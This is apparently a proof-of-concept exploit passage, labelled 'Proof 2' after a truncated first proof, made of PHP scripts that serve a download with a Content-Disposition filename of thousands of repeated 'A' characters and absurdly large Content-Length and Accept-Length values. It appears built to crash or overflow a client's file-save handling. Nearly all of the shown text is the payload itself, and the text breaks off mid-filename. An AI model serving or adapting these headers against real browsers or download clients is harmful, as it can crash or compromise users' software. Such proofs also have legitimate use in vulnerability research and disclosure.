AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); // file name shown in the client's save dialog
?>


Proof 2:

<?php
header("Content-type: application/octet-stream"); // the returned file
header("Accept-Ranges: bytes"); // serve byte ranges
header("Accept-Length: 8999999999999999999999999999999999999899999999999999999999999999999999999989999999999999999989999999999999"); // returned file size
header("Content-Length: 8999999999999999999999999999999999999899999999999999999999999999999999999989999999999999999989999999999999"); // returned file size
header("Content-Disposition: attachment; filename=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA